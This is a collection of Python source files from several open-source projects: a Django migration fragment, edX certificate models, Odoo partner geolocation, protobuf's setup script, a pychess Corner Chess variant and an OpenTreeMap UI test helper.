('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
('tag', models.ForeignKey(verbose_name='tag', related_name='tag_httpresource_set', to='util.HtmlTag', help_text='HTML Tag used to call this resource')),
],
options={
'verbose_name': 'Http resource',
'verbose_name_plural': 'Http resources',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HttpResourcesConfig',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_httpresourcesconfig_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
('resources', models.ManyToManyField(verbose_name='HTTP resources', to='util.HttpResource', related_name='view_set', blank=True, help_text='List of resources used by this view (CSS, JS, Meta, ...)')),
],
options={
'verbose_name': 'Http resources configuration',
'verbose_name_plural': 'Http resources configurations',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Keyword',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_keyword_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'keyword',
'verbose_name_plural': 'keywords',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Locale',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_locale_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'locale',
'verbose_name_plural': 'locales',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Mime',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('reference', models.CharField(verbose_name='reference', blank=True, max_length=127, help_text='Mime type reference')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_mime_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'MIME type',
'verbose_name_plural': 'MIME types',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MimeRegistry',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'MIME registry',
'verbose_name_plural': 'MIME registries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='State',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('code', models.CharField(unique=True, verbose_name='code', max_length=5, help_text='Two letters code')),
],
options={
'verbose_name': 'state',
'verbose_name_plural': 'states',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StateCategory',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('plural', models.CharField(verbose_name='plural', max_length=127, help_text='Plural label')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'state category',
'verbose_name_plural': 'state categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('model', models.CharField(verbose_name='model', max_length=32, help_text='Model related to the status')),
('is_default', models.BooleanField(verbose_name='status name', default=False, help_text='Is the status the default one for the model ?')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'status',
'verbose_name_plural': 'statuses',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TimeZone',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'timezone',
'verbose_name_plural': 'timezones',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='state',
name='category',
field=models.ForeignKey(verbose_name='category', related_name='registry_state_set', to='util.StateCategory', help_text='State, Province or District'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='country',
field=models.ForeignKey(verbose_name='country', related_name='state_set', to='util.Country', help_text='Related country'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='created_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='deleted_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='last_modified_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data'),
preserve_default=True,
),
migrations.AddField(
model_name='mime',
name='registry',
field=models.ForeignKey(verbose_name='registry', related_name='registry_mime_set', to='util.MimeRegistry', help_text='Mime type registry'),
preserve_default=True,
),
]
|
XiaodunServerGroup/xiaodun-platform
|
refs/heads/master
|
lms/djangoapps/certificates/models.py
|
22
|
from django.contrib.auth.models import User
from django.db import models
from datetime import datetime
from model_utils import Choices
"""
Certificates are created for a student and an offering of a course.
When a certificate is generated, a unique ID is generated so that
the certificate can be verified later. The ID is a UUID4, so that
it can't be easily guessed and so that it is unique.
Certificates are generated in batches by a cron job; when a
certificate is available for download, the GeneratedCertificate
table is updated with information that will be displayed
on the course overview page.
State diagram:
[deleted,error,unavailable] [error,downloadable]
+ + +
| | |
| | |
add_cert regen_cert del_cert
| | |
v v v
[generating] [regenerating] [deleting]
+ + +
| | |
certificate certificate certificate
created removed,created deleted
+----------------+-------------+------->[error]
| | |
| | |
v v v
[downloadable] [downloadable] [deleted]
Eligibility:
Students are eligible for a certificate if they pass the course
with the following exceptions:
If the student has allow_certificate set to False in the student profile,
he will never be issued a certificate.
If the user and course are present in the certificate whitelist table,
then the student will be issued a certificate regardless of his grade,
unless he has allow_certificate set to False.
"""
class CertificateStatuses(object):
deleted = 'deleted'
deleting = 'deleting'
downloadable = 'downloadable'
error = 'error'
generating = 'generating'
notpassing = 'notpassing'
regenerating = 'regenerating'
restricted = 'restricted'
unavailable = 'unavailable'
class CertificateWhitelist(models.Model):
"""
Tracks students who are whitelisted; all users
in this table will always qualify for a certificate
regardless of their grade, unless they are on the
embargoed country restriction list
(allow_certificate set to False in userprofile).
"""
user = models.ForeignKey(User)
course_id = models.CharField(max_length=255, blank=True, default='')
whitelist = models.BooleanField(default=0)
class GeneratedCertificate(models.Model):
user = models.ForeignKey(User)
course_id = models.CharField(max_length=255, blank=True, default='')
verify_uuid = models.CharField(max_length=32, blank=True, default='')
download_uuid = models.CharField(max_length=32, blank=True, default='')
download_url = models.CharField(max_length=128, blank=True, default='')
grade = models.CharField(max_length=5, blank=True, default='')
key = models.CharField(max_length=32, blank=True, default='')
distinction = models.BooleanField(default=False)
status = models.CharField(max_length=32, default='unavailable')
MODES = Choices('verified', 'honor', 'audit')
mode = models.CharField(max_length=32, choices=MODES, default=MODES.honor)
name = models.CharField(blank=True, max_length=255)
created_date = models.DateTimeField(
auto_now_add=True, default=datetime.now)
modified_date = models.DateTimeField(
auto_now=True, default=datetime.now)
error_reason = models.CharField(max_length=512, blank=True, default='')
class Meta:
unique_together = (('user', 'course_id'),)
def certificate_status_for_student(student, course_id):
'''
This returns a dictionary with a key for status, and other information.
The status is one of the following:
unavailable - No entry for this student--if they are actually in
the course, they probably have not been graded for
certificate generation yet.
generating - A request has been made to generate a certificate,
but it has not been generated yet.
regenerating - A request has been made to regenerate a certificate,
but it has not been generated yet.
deleting - A request has been made to delete a certificate.
deleted - The certificate has been deleted.
downloadable - The certificate is available for download.
notpassing - The student was graded but is not passing
restricted - The student is on the restricted embargo list and
should not be issued a certificate. This will
be set if allow_certificate is set to False in
the userprofile table
If the status is "downloadable", the dictionary also contains
"download_url".
If the student has been graded, the dictionary also contains their
grade for the course with the key "grade".
'''
try:
generated_certificate = GeneratedCertificate.objects.get(
user=student, course_id=course_id)
d = {'status': generated_certificate.status,
'mode': generated_certificate.mode}
if generated_certificate.grade:
d['grade'] = generated_certificate.grade
if generated_certificate.status == CertificateStatuses.downloadable:
d['download_url'] = generated_certificate.download_url
return d
except GeneratedCertificate.DoesNotExist:
pass
return {'status': CertificateStatuses.unavailable, 'mode': GeneratedCertificate.MODES.honor}
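# Illustrative usage sketch (added for clarity, not part of the original module):
# the dict shape returned by certificate_status_for_student() for a hypothetical
# student and course id, assuming a downloadable certificate row exists.
#
#     status = certificate_status_for_student(student, 'MITx/6.002x/2013_Spring')
#     # -> {'status': 'downloadable', 'mode': 'honor',
#     #     'grade': '0.95', 'download_url': 'https://.../cert.pdf'}
#
# With no GeneratedCertificate row for that user and course, the function falls
# back to {'status': 'unavailable', 'mode': 'honor'}.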
|
joariasl/odoo
|
refs/heads/8.0
|
addons/base_geolocalize/models/res_partner.py
|
239
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
try:
import simplejson as json
except ImportError:
import json # noqa
import urllib
from openerp.osv import osv, fields
from openerp import tools
from openerp.tools.translate import _
def geo_find(addr):
url = 'https://maps.googleapis.com/maps/api/geocode/json?sensor=false&address='
url += urllib.quote(addr.encode('utf8'))
try:
result = json.load(urllib.urlopen(url))
except Exception, e:
raise osv.except_osv(_('Network error'),
_('Cannot contact geolocation servers. Please make sure that your internet connection is up and running (%s).') % e)
if result['status'] != 'OK':
return None
try:
geo = result['results'][0]['geometry']['location']
return float(geo['lat']), float(geo['lng'])
except (KeyError, ValueError):
return None
def geo_query_address(street=None, zip=None, city=None, state=None, country=None):
if country and ',' in country and (country.endswith(' of') or country.endswith(' of the')):
# put country qualifier in front, otherwise GMap gives wrong results,
# e.g. 'Congo, Democratic Republic of the' => 'Democratic Republic of the Congo'
country = '{1} {0}'.format(*country.split(',', 1))
return tools.ustr(', '.join(filter(None, [street,
("%s %s" % (zip or '', city or '')).strip(),
state,
country])))
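# Illustrative sketch (added for clarity, not in the original file): the query
# string geo_query_address() builds for a hypothetical partner address.
#
#     geo_query_address(street='Chaussee de Namur 40', zip='1367',
#                       city='Grand-Rosiere', country='Belgium')
#     # -> u'Chaussee de Namur 40, 1367 Grand-Rosiere, Belgium'
#
# The zip and city are collapsed into a single "zip city" component and empty
# parts are filtered out before joining with ', '.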
class res_partner(osv.osv):
_inherit = "res.partner"
_columns = {
'partner_latitude': fields.float('Geo Latitude', digits=(16, 5)),
'partner_longitude': fields.float('Geo Longitude', digits=(16, 5)),
'date_localization': fields.date('Geo Localization Date'),
}
def geo_localize(self, cr, uid, ids, context=None):
# Don't pass context to browse()! We need country names in english below
for partner in self.browse(cr, uid, ids):
if not partner:
continue
result = geo_find(geo_query_address(street=partner.street,
zip=partner.zip,
city=partner.city,
state=partner.state_id.name,
country=partner.country_id.name))
if result:
self.write(cr, uid, [partner.id], {
'partner_latitude': result[0],
'partner_longitude': result[1],
'date_localization': fields.date.context_today(self, cr, uid, context=context)
}, context=context)
return True
|
atomicobject/kinetic-c
|
refs/heads/master
|
vendor/protobuf-2.5.0/python/setup.py
|
32
|
#! /usr/bin/python
#
# See README for usage instructions.
import sys
import os
import subprocess
# We must use setuptools, not distutils, because we need to use the
# namespace_packages option for the "google" package.
try:
from setuptools import setup, Extension
except ImportError:
try:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, Extension
except ImportError:
sys.stderr.write(
"Could not import setuptools; make sure you have setuptools or "
"ez_setup installed.\n")
raise
from distutils.command.clean import clean as _clean
from distutils.command.build_py import build_py as _build_py
from distutils.spawn import find_executable
maintainer_email = "[email protected]"
# Find the Protocol Compiler.
if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):
protoc = os.environ['PROTOC']
elif os.path.exists("../src/protoc"):
protoc = "../src/protoc"
elif os.path.exists("../src/protoc.exe"):
protoc = "../src/protoc.exe"
elif os.path.exists("../vsprojects/Debug/protoc.exe"):
protoc = "../vsprojects/Debug/protoc.exe"
elif os.path.exists("../vsprojects/Release/protoc.exe"):
protoc = "../vsprojects/Release/protoc.exe"
else:
protoc = find_executable("protoc")
def generate_proto(source):
"""Invokes the Protocol Compiler to generate a _pb2.py from the given
.proto file. Does nothing if the output already exists and is newer than
the input."""
output = source.replace(".proto", "_pb2.py").replace("../src/", "")
if (not os.path.exists(output) or
(os.path.exists(source) and
os.path.getmtime(source) > os.path.getmtime(output))):
print "Generating %s..." % output
if not os.path.exists(source):
sys.stderr.write("Can't find required file: %s\n" % source)
sys.exit(-1)
if protoc is None:
sys.stderr.write(
"protoc is not installed nor found in ../src. Please compile it "
"or install the binary package.\n")
sys.exit(-1)
protoc_command = [ protoc, "-I../src", "-I.", "--python_out=.", source ]
if subprocess.call(protoc_command) != 0:
sys.exit(-1)
def GenerateUnittestProtos():
generate_proto("../src/google/protobuf/unittest.proto")
generate_proto("../src/google/protobuf/unittest_custom_options.proto")
generate_proto("../src/google/protobuf/unittest_import.proto")
generate_proto("../src/google/protobuf/unittest_import_public.proto")
generate_proto("../src/google/protobuf/unittest_mset.proto")
generate_proto("../src/google/protobuf/unittest_no_generic_services.proto")
generate_proto("google/protobuf/internal/test_bad_identifiers.proto")
generate_proto("google/protobuf/internal/more_extensions.proto")
generate_proto("google/protobuf/internal/more_extensions_dynamic.proto")
generate_proto("google/protobuf/internal/more_messages.proto")
generate_proto("google/protobuf/internal/factory_test1.proto")
generate_proto("google/protobuf/internal/factory_test2.proto")
def MakeTestSuite():
# This is apparently needed on some systems to make sure that the tests
# work even if a previous version is already installed.
if 'google' in sys.modules:
del sys.modules['google']
GenerateUnittestProtos()
import unittest
import google.protobuf.internal.generator_test as generator_test
import google.protobuf.internal.descriptor_test as descriptor_test
import google.protobuf.internal.reflection_test as reflection_test
import google.protobuf.internal.service_reflection_test \
as service_reflection_test
import google.protobuf.internal.text_format_test as text_format_test
import google.protobuf.internal.wire_format_test as wire_format_test
import google.protobuf.internal.unknown_fields_test as unknown_fields_test
import google.protobuf.internal.descriptor_database_test \
as descriptor_database_test
import google.protobuf.internal.descriptor_pool_test as descriptor_pool_test
import google.protobuf.internal.message_factory_test as message_factory_test
import google.protobuf.internal.message_cpp_test as message_cpp_test
import google.protobuf.internal.reflection_cpp_generated_test \
as reflection_cpp_generated_test
loader = unittest.defaultTestLoader
suite = unittest.TestSuite()
for test in [ generator_test,
descriptor_test,
reflection_test,
service_reflection_test,
text_format_test,
wire_format_test ]:
suite.addTest(loader.loadTestsFromModule(test))
return suite
class clean(_clean):
def run(self):
# Delete generated files in the code tree.
for (dirpath, dirnames, filenames) in os.walk("."):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
if filepath.endswith("_pb2.py") or filepath.endswith(".pyc") or \
filepath.endswith(".so") or filepath.endswith(".o") or \
filepath.endswith('google/protobuf/compiler/__init__.py'):
os.remove(filepath)
# _clean is an old-style class, so super() doesn't work.
_clean.run(self)
class build_py(_build_py):
def run(self):
# Generate necessary .proto file if it doesn't exist.
generate_proto("../src/google/protobuf/descriptor.proto")
generate_proto("../src/google/protobuf/compiler/plugin.proto")
GenerateUnittestProtos()
# Make sure google.protobuf.compiler is a valid package.
open('google/protobuf/compiler/__init__.py', 'a').close()
# _build_py is an old-style class, so super() doesn't work.
_build_py.run(self)
if __name__ == '__main__':
ext_module_list = []
# C++ implementation extension
if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION", "python") == "cpp":
print "Using EXPERIMENTAL C++ Implmenetation."
ext_module_list.append(Extension(
"google.protobuf.internal._net_proto2___python",
[ "google/protobuf/pyext/python_descriptor.cc",
"google/protobuf/pyext/python_protobuf.cc",
"google/protobuf/pyext/python-proto2.cc" ],
include_dirs = [ "." ],
libraries = [ "protobuf" ]))
setup(name = 'protobuf',
version = '2.5.0',
packages = [ 'google' ],
namespace_packages = [ 'google' ],
test_suite = 'setup.MakeTestSuite',
# Must list modules explicitly so that we don't install tests.
py_modules = [
'google.protobuf.internal.api_implementation',
'google.protobuf.internal.containers',
'google.protobuf.internal.cpp_message',
'google.protobuf.internal.decoder',
'google.protobuf.internal.encoder',
'google.protobuf.internal.enum_type_wrapper',
'google.protobuf.internal.message_listener',
'google.protobuf.internal.python_message',
'google.protobuf.internal.type_checkers',
'google.protobuf.internal.wire_format',
'google.protobuf.descriptor',
'google.protobuf.descriptor_pb2',
'google.protobuf.compiler.plugin_pb2',
'google.protobuf.message',
'google.protobuf.descriptor_database',
'google.protobuf.descriptor_pool',
'google.protobuf.message_factory',
'google.protobuf.reflection',
'google.protobuf.service',
'google.protobuf.service_reflection',
'google.protobuf.text_format' ],
cmdclass = { 'clean': clean, 'build_py': build_py },
install_requires = ['setuptools'],
ext_modules = ext_module_list,
url = 'http://code.google.com/p/protobuf/',
maintainer = maintainer_email,
maintainer_email = '[email protected]',
license = 'New BSD License',
description = 'Protocol Buffers',
long_description =
"Protocol Buffers are Google's data interchange format.",
)
|
Tyler2004/pychess
|
refs/heads/master
|
lib/pychess/Variants/corner.py
|
20
|
from __future__ import print_function
# Corner Chess
import random
from pychess.Utils.const import *
from pychess.Utils.Board import Board
class CornerBoard(Board):
variant = CORNERCHESS
def __init__ (self, setup=False, lboard=None):
if setup is True:
Board.__init__(self, setup=self.shuffle_start(), lboard=lboard)
else:
Board.__init__(self, setup=setup, lboard=lboard)
def shuffle_start(self):
b1 = b2 = 0
tmp = ['r', 'n', 'b', 'q', 'b', 'n', 'r']
while (b1%2 == b2%2):
random.shuffle(tmp)
b1 = tmp.index('b')
b2 = tmp.index('b', b1+1)
tmp = ''.join(tmp)
tmp = 'k' + tmp + '/pppppppp/8/8/8/8/PPPPPPPP/' + tmp[::-1].upper() + 'K w - - 0 1'
return tmp
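# Illustrative sketch (added; not part of the original file): one FEN that
# shuffle_start() could return, assuming the shuffle happens to yield 'rnqbbnr'
# (bishop indices 3 and 4, i.e. opposite-coloured squares):
#
#     'krnqbbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBBQNRK w - - 0 1'
#
# Black's king sits in the a8 corner, and white's setup is black's rotated
# 180 degrees, so the white king ends up in the h1 corner.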
class CornerChess:
__desc__ = \
_("http://brainking.com/en/GameRules?tp=2\n" +
"* Placement of the pieces on the 1st and 8th row are randomized\n" +
"* The king is in the right hand corner\n" +
"* Bishops must start on opposite color squares\n" +
"* Black's starting position is obtained by rotating white's position 180 degrees around the board's center\n" +
"* No castling")
name = _("Corner")
cecp_name = "nocastle"
board = CornerBoard
need_initial_board = True
standard_rules = True
variant_group = VARIANTS_SHUFFLE
if __name__ == '__main__':
Board = CornerBoard(True)
for i in range(10):
print(Board.shuffle_start())
|
johnsonc/OTM2
|
refs/heads/master
|
opentreemap/treemap/tests/ui/__init__.py
|
3
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import importlib
from time import sleep
from django.test import LiveServerTestCase
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from registration.models import RegistrationProfile
from selenium.common.exceptions import (WebDriverException,
StaleElementReferenceException)
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from treemap.tests import make_commander_user, create_mock_system_user
from treemap.models import Instance, Tree, Plot
from treemap.lib.object_caches import clear_caches
from treemap.plugin import setup_for_ui_test
def patch_broken_pipe_error():
"""
Monkey Patch BaseServer.handle_error to not write
a stacktrace to stderr on broken pipe.
http://stackoverflow.com/a/21788372/362702
"""
import sys
from SocketServer import BaseServer
from wsgiref import handlers
handle_error = BaseServer.handle_error
log_exception = handlers.BaseHandler.log_exception
def is_broken_pipe_error():
type, err, tb = sys.exc_info()
return repr(err) == "error(32, 'Broken pipe')"
def my_handle_error(self, request, client_address):
if not is_broken_pipe_error():
handle_error(self, request, client_address)
def my_log_exception(self, exc_info):
if not is_broken_pipe_error():
log_exception(self, exc_info)
BaseServer.handle_error = my_handle_error
handlers.BaseHandler.log_exception = my_log_exception
# In many tests we close the browser when there are still pending requests,
# such as for map tiles. When running on a dev machine that leads to messy
# output about "broken pipe" errors. Muzzle it.
patch_broken_pipe_error()
class UITestCase(LiveServerTestCase):
